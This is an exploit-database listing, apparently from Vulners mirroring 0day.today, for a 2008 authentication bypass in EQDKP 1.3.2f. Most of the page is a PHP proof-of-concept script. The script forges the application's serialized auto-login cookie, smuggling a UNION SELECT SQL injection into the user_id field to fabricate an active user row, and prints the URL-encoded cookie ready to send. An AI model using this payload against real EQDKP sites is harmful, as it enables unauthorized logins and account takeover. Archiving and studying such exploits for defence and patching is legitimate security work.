Lucene search

K

EQDKP 1.3.2f (user_id) Authentication Bypass (PoC)

🗓️ 13 May 2008 00:00:00Reported by vortfuType 
zdt
 zdt
🔗 0day.today👁 12 Views

EQDKP 1.3.2f Authentication Bypass (PoC) PHP exploi

Show more
Code
==================================================
EQDKP 1.3.2f (user_id) Authentication Bypass (PoC)
==================================================



<?php
   // EQDKP 1.3.2f Authentication Bypass (PoC)
 
   $data['auto_login_id'] = 'x';
   $data['user_id']       = "1' " .
                            "UNION SELECT " .
                               "1, " .         // * user_id
                               "'a', " .       // username
                               "'x', " .       // * user_password
                               "'', " .        // user_email
                               "1, " .         // user_alimit
                               "1, " .         // user_elimit
                               "1, " .         // user_ilimit
                               "1, " .         // user_nlimit
                               "1, " .         // user_rlimit
                               "1, " .         // user_style
                               "'english', " . // user_lang
                               "NULL, " .      // user_key
                               "1, " .         // user_lastvisit
                               "NULL, " .      // user_lastpage
                               "1, " .         // * user_active
                               "NULL, " .      // user_newpassword
                               "NULL " .       // session_current
                            "ORDER BY " .
                               "username ASC" .
                            "/*";
 
   $cookie = serialize($data);
   echo "eqdkp_data\n\n";
 
   for($i = 0; $i < strlen($cookie); $i++)
      echo '%' . bin2hex($cookie[$i]);
 
   echo "\n\n";
?> 



#  0day.today [2018-01-10]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 May 2008 00:00Current
7.1High risk
Vulners AI Score7.1
12
.json
Report